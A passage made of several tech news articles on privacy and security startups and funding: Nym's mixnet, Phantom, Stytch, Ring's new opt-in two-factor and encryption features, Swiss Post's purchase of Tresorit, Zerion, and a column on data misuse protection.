There are now a range of startups seeking to decentralize various aspects of Internet or common computing infrastructure — from file storage to decentralized DNS. And while some of these tout increased security and privacy as core benefits of decentralization — suggesting they can ‘fix’ the problem of mass surveillance by having an architecture that massively distributes data, Halpin argues that a privacy claim being routinely attached to decentralized infrastructure is misplaced. (He points to a paper he co-authored on this topic, entitled Systematizing Decentralization and Privacy: Lessons from 15 Years of Research and Deployments.)

“Almost all of those projects gain decentralization at the cost of privacy,” he argues. “Because any decentralized system is easier to observe because the crowd has been spread out… than a centralized system — to a large extent. If the adversary is sufficiently powerful enough all the participants in the system. And historically we believe that most people who are interested in decentralization are not expects in privacy and underestimate how easy it is to observe decentalized systems — because most of these systems are actually pretty small.”

He points out there are “only” 10,000 full nodes in Bitcoin, for example, and a similar amount in Ethereum — while other, newer and more nascent decentralized services are likely to have fewer nodes, maybe even just a few hundred or thousand.

And while the Nym network has a similar amount of nodes to Bitcoin, the difference is it’s a mixnet too — so it’s not just decentralized but it’s also using multiple layers of encryption and traffic mixing and the various other obfuscation steps which he says “none of these other people do”.

“We assume the enemy is observing everything in our software,” he adds. “We are not what we call ‘security through obscurity’ — security through obscurity means you assume the enemy just can’t see everything; isn’t looking at your software too carefully; doesn’t know where all your servers are. But — realistically — in an age of mass surveillance, the enemy will know where all your services are and they can observe all the packets coming in, all the packets coming out. And that’s a real problem for decentralized networks.”

Post-Snowden, there’s certainly been growing interest in privacy by design — and a handful of startups and companies have been able to build momentum for services that promise to shield users’ data, such as DuckDuckGo (non-tracking search); Protonmail (e2e encrypted email); and Brave (privacy-safe browsing). Apple has also, of course, very successfully markets its premium hardware under a ‘privacy respecting’ banner.

Halpin says he wants Nym to be part of that movement; building privacy tech that can touch the mainstream.

“Because there’s so much venture capital floating into the market right now I think we have a once in a generation chance — just as everyone was excited about p2p in 2000 — we have a once in a generation chance to build privacy technology and we should build companies which natively support privacy, rather than just trying to bolt it on, in a half hearted manner, onto non-privacy respecting business models.

“Now I think the real question — which is why we didn’t raise more money — is, is there enough consumer and business demand that we can actually discover what the cost of privacy actually is? How much are people willing to pay for it and how much does it cost? And what we do is we do privacy on such a fundamental level is we say what is the cost of a privacy-enhanced byte or packet? So that’s what we’re trying to figure out: How much would people pay just for a privacy-enhanced byte and how much does just a privacy enhanced byte cost? And is this a small enough marginal cost that it can be added to all sorts of systems — just as we added TLS to all sorts of systems and encryption.”

#aws, #binance-labs, #blockchain, #cloud-services, #cryptocurrency, #cryptography, #encryption, #europe, #european-union, #machine-learning, #p2p, #polychain-capital, #privacy, #privacy-technology, #routing, #snowden, #surveillance-law, #tc, #tor, #vpn

Crypto startup Phantom banks funding from Andreessen Horowitz to scale its multi-chain wallet

While retail investors grew more comfortable buying cryptocurrencies like Bitcoin and Ethereum in 2021, the decentralized application world still has a lot of work to do when it comes to onboarding a mainstream user base.

Phantom is part of a new class of crypto startups looking to build infrastructure that streamlines blockchain-based applications and provides a more user-friendly UX for navigating the crypto world, something that can make the entire space more approachable to a non-developer audience. Users can download the Phantom wallet to their browsers to interact with applications, swap tokens and collect NFTs.

The crypto wallet startup has banked a $9 million Series A round led by Andreessen Horowitz (a16z) with Variant Fund, Jump Capital, DeFi Alliance, Solana Foundation and Garry Tan also participating. The round, which closed earlier this summer, comes as some venture capital firms embrace a crypto future even as volatility continues to envelop the broader market. Last month, a16z announced a whopping 2.2 billion crypto fund, the firm’s largest vertical-specific investment vehicle ever.

via Phantom

The co-founding team of CEO Brandon Millman, CPO Chris Kalani and CEO Francesco Agosti all come aboard from crypto infrastructure startup 0x.

At the moment, Phantom is best-known among the Solana community where it has become the go-to wallet for applications on that blockchain. The startup’s ambition is to interface with more and more networks, currently building out compatibility with Ethereum and looking to embrace other blockchains, aiming to be a product built for a “multi-chain world,” Millman tells TechCrunch.

Alongside building out support for other networks, Phantom wants to build more sophisticated DeFi mechanisms right into their wallet, allowing users to stake cryptocurrencies and swap more tokens inside the wallet.

The startup says they have some 40,000 users of their existing wallet product.

Building out a presence on the popular Ethereum blockchain, which already has a handful of popular wallet providers, will be a challenge, but Phantom’s broadest challenge is helping a new breed of crypto-curious users interface with a network of apps that still have a long way to go when it comes to being mainstream-friendly.

“The entire space is kind of stuck in this ‘built by developers for other developers mode,’” Millman says. “This bar has been kind of stuck there, and no one is really stepping up to push the bar up higher.”

#andreessen-horowitz, #articles, #bitcoin, #blockchain, #blockchains, #ceo, #crypto-startups, #cryptocurrencies, #cryptocurrency, #cryptography, #decentralization, #decentralized-finance, #ethereum, #garry-tan, #jump-capital, #retail-investors, #tc, #techcrunch, #venture-capital-firms

Ex-Plaid employees raise $30M for Stytch, an API-first passwordless authentication platform

There are far fewer annoying things than managing one’s passwords.

There are a bunch of companies out there to help you attempt to do that. And there’s also a number of companies that want to go a step further and eliminate the password completely.

One such company, Stytch, just raised $30 million in a Series A round of funding as it launches out of beta with its API-first passwordless authentication platform.

The round caught our attention for a couple of reasons.

For one, this is the same startup that just months earlier announced it had raised a $6.25 million seed round led by Benchmark with participation from Index Ventures and a number of angels including Plaid co-founder William Hockey. That round was speculated to have valued the new company at a staggering $200 million (although that was never confirmed), and was actually raised last summer around the time of Stytch’s founding, but only announced this year. Other angels that have backed the company include Figma co-founder and CEO Dylan Field, Very Good Security co-founder Mahmoud Abdelkader, startup advisor Elad Gil and early Stripe employee and Cocoon co-founder Amber Feng.

Also notable about this round is that Stytch was founded by two former Plaid employees, Reed McGinley-Stempel (CEO) and Julianna Lamb (CTO), who built user authentication features that “millions” use to connect their bank accounts to apps like Venmo, Coinbase and Robinhood. The company was founded on the premise that passwords are no longer secure, and make companies easy targets for hackers and expose them to account takeover risk.

Lamb says that as she and McGinley-Stempel worked together at Plaid on user authentication, they realized how frustrating it is to build sign-up and login flows.

“In addition to it being complicated, it’s resource intensive and error-prone to build in house,” she told TechCrunch. “The other thing that really frustrated us was that the core building blocks that all companies use for authentication had really significant security and conversion issues. It struck us that the web has improved in so many ways over the past few decades, but authentication is still stuck in the 1990s.”

Thrive Capital led the Series A, which also included participation from Coatue Management and existing backers Benchmark and Index. The company declined to reveal its new valuation, although sources say only that it is “north of $200 million.”

Stytch claims that it simplifies the authentication process by giving developers and users the “tools and infrastructure to incorporate passwordless authentication methods into modern applications.”

Specifically, the team is creating “simple” APIs and SDKs (software development kits) that the founders say allow “any company to boost user onboarding and retention by removing passwords from their application, while improving security and saving significant engineering time in the process.”

Image Credits: Stytch

In its first year of operation, Stytch released its product in beta to more than 350 developers who have added passwordless features such as email magic links, SMS and WhatsApp passcodes and one-click user invitations into their user onboarding and authentication login flows. As mentioned above, Stytch launched out of beta this week to make all of the features publicly available in conjunction with the funding announcement. 

“What we found is that it makes more sense to be more flexible with developers,” Lamb told TechCrunch. “The thing that even surprised us about the API-first approach is that we now also have a handful of Fortune 500 companies using the product and the primary reasoning from their standpoint was one of the simplicity of getting set up on the platform. It took them an hour rather than the multiple months they sometimes spend with other providers. There is also the direct API piece where it’s just a much more flexible way to think about workflows in onboarding or login.”

Nearly 65% of users reuse passwords across accounts, which can pose major security threats and breach liabilities, according to a study conducted by Google. Also, many people struggle with remembering passwords and the password reset process can be so frustrating that many users just give up on the account.

This can negatively impact businesses that rely on e-commerce sites, who lose customers over that frustration.

Thrive’s Gaurav Ahuja, who is taking a seat on Stytch’s board with the funding round, believes that the startup’s product is specifically designed for improving sign-up conversion and user retention, and its customizable front end tools help companies get started “quickly.”

He said his firm talked to many developers who used it and saw “how impressed they were with the company’s best-in-class API docs and speed to go live.”

Over the past several years we’ve seen that most authentication systems are both outdated and pose a security risk to users,” Ahuja told TechCrunch via email. “Stytch is addressing both of these issues head on.”

The new capital will be used to roll out more authentication options, including biometrics, WebAuthn, OAuth logins, QR codes and push notification login. The company also plans to launch additional user infrastructure features and to build out session management and advanced fraud detection solutions. Stytch also aims to hire 20 people by year’s end.

Stytch is not the only company out to kill the password. Boston-based Transmit Security in June raised a massive $543 million in Series A funding in what was believed to be the largest Series A investment in cybersecurity history and one of the highest valuations for a bootstrapped company. Microsoft has announced plans to make Windows 10 password-free, and Apple recently previewed Passkeys in iCloud Keychain, a method of passwordless authentication powered by WebAuth.

 

#access-control, #api, #bank, #coinbase, #computer-security, #cryptography, #funding, #fundings-exits, #password, #plaid, #recent-funding, #secret-double-octopus, #security, #sms, #startups, #stytch, #tc, #thrive-capital, #venmo, #venture-capital, #william-hockey

Ring’s latest security updates are good, but still opt-in

Ring, the video doorbell maker dubbed the “largest civilian surveillance network the U.S. has ever seen,” is rolling out new but long overdue security and privacy features.

The Amazon-owned company’s reputation was bruised after a spate of account breaches in late 2019, in which hackers broke into Ring user accounts and harassed children in their own homes. Then, taking advantage of Ring’s weak security practices, hackers had developed bespoke software to brute-force the passwords on Ring accounts, which at this point were only protected by the user’s password. All the while, there were several caches of Ring user passwords floating around the dark web. Ring initially blamed its users for using weak passwords (like “password” and “12345678,” which Ring allowed users to set as passwords), but a couple of months later the company acknowledged its failings by rolling out mandatory two-factor authentication by text message. It was a good start, aimed at making it more difficult — albeit only slightly — to curb the bulk of automated account hijacks.

But now Ring is going a step further by rolling out app-based two-factor authentication, which many companies already offer (and have for some time) as it provides the far more secure delivery of two-factor codes using an encrypted connection, compared to text messages, which are susceptible to interception.

Ring is also enabling CAPTCHA in its apps to add another hurdle aimed at making automated login attempts more difficult by prompting users to prove they aren’t a robot.

Also announced is the launch of video end-to-end encryption, which Ring first rolled out earlier this year as a technical preview. One of Ring’s most flaunted (though highly controversial) features is allowing users to share video footage directly with more than 1,800 local police departments that are partnered with Ring. That said, police with a search warrant can always just demand the footage from Ring instead. Video end-to-end encryption will mean that any video captured from a Ring device can only be accessed by the account owner — and not Ring, or any of its law enforcement partners.

Ring’s CTO Josh Roth said in a blog post that Ring believes that “our customers should control who sees their videos.” If that were true, Ring would have switched on end-to-end encryption to all users, giving every account owner privacy by default. But that would interfere with the company’s efforts to expand its police partnerships, which in turn help to get Ring devices into the hands of local residents.

Compared to past security updates, which didn’t go nearly far enough, Ring’s new features make meaningful changes that give users the choice to make their accounts more secure and their data private. But the keyword there is “choice,” since users will have to opt-in to the new features. That isn’t unusual in itself; companies seldom force security changes on users fearing that it would add friction to the user experience, though recovering from an account hack because of poor security controls is undoubtedly worse.

Switching to app-based two-factor authentication is easy, just go to Ring’s account settings and switch from codes sent by text message to codes delivered by an authenticator app. We have a whole explainer on why it’s important, why you should use an app, and which apps you might want to use.

But the biggest change Ring users can make is to switch on end-to-end encryption on their accounts by going through the advanced settings of Ring’s control center. Switching on end-to-end encryption won’t limit what you can do with your account or stop you from sharing video footage with friends, family, or the police, but it will give you peace of mind knowing that you will have control of your data and what you do with it, and not Ring.

#access-control, #amazon, #apps, #computer-security, #cryptography, #cto, #dark-web, #encryption, #multi-factor-authentication, #password, #privacy, #ring, #security, #united-states

Swiss Post acquires e2e encrypted cloud services provider, Tresorit

Swiss Post, the former state-owned mail delivery firm which became a private limited company in 2013, diversifying into logistics, finance, transport and more (including dabbling in drone delivery) while retaining its role as Switzerland’s national postal service, has acquired a majority stake in Swiss-Hungarian startup Tresorit, an early European pioneer in end-to-end-encrypted cloud services.

Terms of the acquisition are not being disclosed. But Swiss Post’s income has been falling in recent years, as (snailmail) letter volumes continue to decline. And a 2019 missive warned its business needed to find new sources of income.

Tresorit, meanwhile, last raised back in 2018 — when it announced an €11.5M Series B round, with investors including 3TS Capital Partners and PortfoLion. Other backers of the startup include business angels and serial entrepreneurs like Márton Szőke, Balázs Fejes and Andreas Kemi. According to Crunchbase Tresorit had raised less than $18M over its decade+ run.

It looks like a measure of the rising store being put on data security that a veteran ‘household’ brand like Swiss Post sees strategic value in extending its suite of digital services with the help of a trusted startup in the e2e encryption space.

‘Zero access’ encryption was still pretty niche back when Tresorit got going over a decade ago but it’s essentially become the gold standard for trusted information security, with a variety of players now offering e2e encrypted services — to businesses and consumers.

Announcing the acquisition in a press release today, the pair said they will “collaborate to further develop privacy-friendly and secure digital services that enable people and businesses to easily exchange information while keeping their data secure and private”.

Tresorit will remain an independent company within Swiss Post Group, continuing to serve its global target regions of EU countries, the UK and the US, with the current management (founders), brand and service also slated to remain unchanged, per the announcement.

The 2011-founded startup sells what it brands as “ultra secure” cloud services — such as storage, file syncing and collaboration — targeted at business users (it has 10,000+ customers globally); all zipped up with a ‘zero access’ promise courtesy of a technical architecture that means Tresorit literally can’t decrypt customer data because it does not hold the encryption keys.

It said today that the acquisition will strengthen its business by supporting further expansion in core markets — including Germany, Austria and Switzerland. (The Swiss Post brand should obviously be a help there.)

The pair also said they see potential for Tresorit’s tech to expand Swiss Post’s existing digital product portfolio — which includes services like a “digital letter box” app (ePost) and an encrypted email offering. So it’s not starting from scratch here.

Commenting on the acquisition in a statement, Istvan Lam, co-founder and CEO of Tresorit, said: “From the very beginning, our mission has been to empower everyone to stay in control of their digital valuables. We are proud to have found a partner in Swiss Post who shares our values on security and privacy and makes us even stronger. We are convinced that this collaboration strengthens both companies and opens up new opportunities for us and our customers.”

Asked why the startup decided to sell at this point in its business development — rather than taking another path, such as an IPO and going public — Lam flagged Swiss Post’s ‘trusted’ brand and what he dubbed a “100% fit” on values and mission.

“Tresorit’s latest investment, our biggest funding round, happened in 2018. As usual with venture capital-backed companies, the lifecycle of this investment round is now beginning to come to an end,” he told TechCrunch.

“Going public via an IPO has also been on our roadmap and could have been a realistic scenario within the next 3-4 years. The reason we have decided to partner now with a strategic investor and collaborate with Swiss Post is that their core values and vision on data privacy is a 100% fit with our values and mission of protecting privacy. With the acquisition, we entered a long-term strategic partnership and are convinced that with Tresorit’s end-to-end encryption technology and the trusted brand of Swiss Post we will further develop services that help individuals and businesses exchange information securely and privately.”

“Tresorit has paved the way for true end-to-end encryption across the software industry over the past decade. With the acquisition of Tresorit, we are strategically expanding our competencies in digital data security and digital privacy, allowing us to further develop existing offers,” added Nicole Burth, a member of the Swiss Post Group executive board and head of communication services, in a supporting statement.

Switzerland remains a bit of a hub for pro-privacy startups and services, owing to a historical reputation for strong privacy laws.

However, as Republik reported earlier this year, state surveillance activity in the country has been stepping up — following a 2018 amendment to legislative powers that expanded intercept capabilities to cover digital comms.

Such encroachments are worrying but may arguably make e2e encryption even more important — as it can offer a technical barrier against state-sanctioned privacy intrusions.

At the same time, there is a risk that legislators perceive rising use of robust encryption as a threat to national security interests and their associated surveillance powers — meaning they could seek to counter the trend by passing even more expansive legislation that directly targets and or even outlaws the use of e2e encryption. (Australia has passed an anti-encryption law, for instance, while the UK cemented its mass surveillance capabilities back in 2016 — passing legislation which includes powers to compel companies to limit the use of encryption.)

At the European Union level, lawmakers have also recently been pushing an agenda of ‘lawful access’ to encrypted data — while simultaneously claiming to support the use of encryption on data security and privacy grounds. Quite how the EU will circle that square in legislative terms remains to be seen.

But there are also some more positive legal headwinds for European encryption startups like Tresorit: A ruling last summer by Europe’s top court dialled up the complexity of taking users’ personal data out of the region — certainly when people’s information is flowing to third countries like the US where it’s at risk from state agencies’ mass surveillance.

Asked if Tresorit has seen a rise in interest in the wake of the ‘Schrems II’ ruling, Lam told us: “We see the demand for European-based SaaS cloud services growing in the future. Being a European-based company has already been an important competitive advantage for us, especially among our business and enterprise customers.”

EU law in this area contains a quirk whereby the national security powers of Member States are not so clearly factored in vs third countries. And while Switzerland is not an EU Member it remains a closely associated country, being part of the bloc’s single market.

Nevertheless, questions over the sustainability of Switzerland’s EU data adequacy decision persist, given concerns that its growing domestic surveillance regime does not provide individuals with adequate redress remedies — and may therefore be violating their fundamental rights.

If Switzerland loses EU data adequacy it could impact the compliance requirements of digital services based in the country — albeit, again, e2e encryption could offer Swiss companies a technical solution to circumvent such legal uncertainty. So that still looks like good news for companies like Tresorit.

 

#3ts-capital-partners, #austria, #cloud, #cloud-services, #cloud-storage, #cryptography, #e2e-encryption, #encryption, #end-to-end-encryption, #europe, #european-union, #fundings-exits, #germany, #privacy, #schrems-ii, #security, #swiss-post, #switzerland, #tc, #tresorit

DeFi investor platform Zerion raises $8.2 million Series A

While crypto exchanges have demystified some of the largest cryptocurrencies for retail investors, many of the intricacies of decentralized finance are still lost on even more savvy investors as a result of DeFi’s weave of diverse offerings.

Zerion, a startup building a decentralized finance “interface” for crypto investors, has attracted venture capitalist attention on the back of recent growth. Amid a renewed crypto gold rush, the company has processed more than $600 million in transaction volume so far this year, now with over 200 thousand monthly active users, CEO Evgeny Yurtaev tells TechCrunch

The startup has also wrapped an $8.2 million Series A funding round led by Mosaic Ventures, with participation from Placeholder, DCG, Lightspeed, Blockchain.com Ventures, among others. Mosaic’s Toby Coppel and Placeholder’s Brad Burnham have joined Zerion’s Board, the startup also shared.

Zerion gives customers access to more than 50,000 digital assets and 60 protocols on the Ethereum blockchain through their app which streamlines the UI of DeFi. Users can access tokens and invest through the app similar to exchanges like Coinbase or Gemini, but do so using their own personal wallets like MetaMask, meaning user funds and private keys aren’t controlled by or accessible to Zerion, a sticking point for Yurtaev, a life-long crypto enthusiast and builder.

Image via Zerion

“There are a bunch of different tokens and protocols in the DeFi space,” Yurtaev says. “In theory, it’s supposed to be easy to navigate, but in reality, it’s all a mess… We try to demystify them.”

Alongside major growth in Ethereum and Bitcoin prices, DeFi volume has surged in 2021, up from just under $20 billion at the year’s start to nearly $90 billion this May. The DeFi market et large has proven just as volatile as Bitcoin, with market volume falling some 35 percent in the past couple months to just over $57 billion.

The startup’s mobile app on iOS and Android has become a particularly popular way for crypto investors to track the market and the tokens they’re backing. The average user opens the app more than 9 times per day, the company says.

Crypto’s 2021 upswing has drawn plenty of investor attention, not only to the assets themselves but to the platforms facilitating those transactions. Last month, venture capital firm Andreessen Horowitz announced that they had raised more than $2.2 billion to invest in startups building products in crypto spaces including decentralized finance.

 

#andreessen-horowitz, #android, #bitcoin, #blockchain, #blockchain-com, #brad-burnham, #ceo, #coinbase, #cryptocurrencies, #cryptocurrency, #cryptography, #decentralized-finance, #ethereum, #finance, #mosaic-ventures, #retail-investors, #tc, #toby-coppel, #uniswap, #venture-capital

To guard against data loss and misuse, the cybersecurity conversation must evolve

Data breaches have become a part of life. They impact hospitals, universities, government agencies, charitable organizations and commercial enterprises. In healthcare alone, 2020 saw 640 breaches, exposing 30 million personal records, a 25% increase over 2019 that equates to roughly two breaches per day, according to the U.S. Department of Health and Human Services. On a global basis, 2.3 billion records were breached in February 2021.

It’s painfully clear that existing data loss prevention (DLP) tools are struggling to deal with the data sprawl, ubiquitous cloud services, device diversity and human behaviors that constitute our virtual world.

Conventional DLP solutions are built on a castle-and-moat framework in which data centers and cloud platforms are the castles holding sensitive data. They’re surrounded by networks, endpoint devices and human beings that serve as moats, defining the defensive security perimeters of every organization. Conventional solutions assign sensitivity ratings to individual data assets and monitor these perimeters to detect the unauthorized movement of sensitive data.

It’s painfully clear that existing data loss prevention (DLP) tools are struggling to deal with the data sprawl, ubiquitous cloud services, device diversity and human behaviors that constitute our virtual world.

Unfortunately, these historical security boundaries are becoming increasingly ambiguous and somewhat irrelevant as bots, APIs and collaboration tools become the primary conduits for sharing and exchanging data.

In reality, data loss is only half the problem confronting a modern enterprise. Corporations are routinely exposed to financial, legal and ethical risks associated with the mishandling or misuse of sensitive information within the corporation itself. The risks associated with the misuse of personally identifiable information have been widely publicized.

However, risks of similar or greater severity can result from the mishandling of intellectual property, material nonpublic information, or any type of data that was obtained through a formal agreement that placed explicit restrictions on its use.

Conventional DLP frameworks are incapable of addressing these challenges. We believe they need to be replaced by a new data misuse protection (DMP) framework that safeguards data from unauthorized or inappropriate use within a corporate environment in addition to its outright theft or inadvertent loss. DMP solutions will provide data assets with more sophisticated self-defense mechanisms instead of relying on the surveillance of traditional security perimeters.

#bridgecrew, #cloud-computing, #collaboration-tools, #column, #computer-security, #cryptography, #data-management, #dlp, #ec-column, #ec-cybersecurity, #ec-enterprise-applications, #enterprise, #security, #security-tools, #stacklet, #startups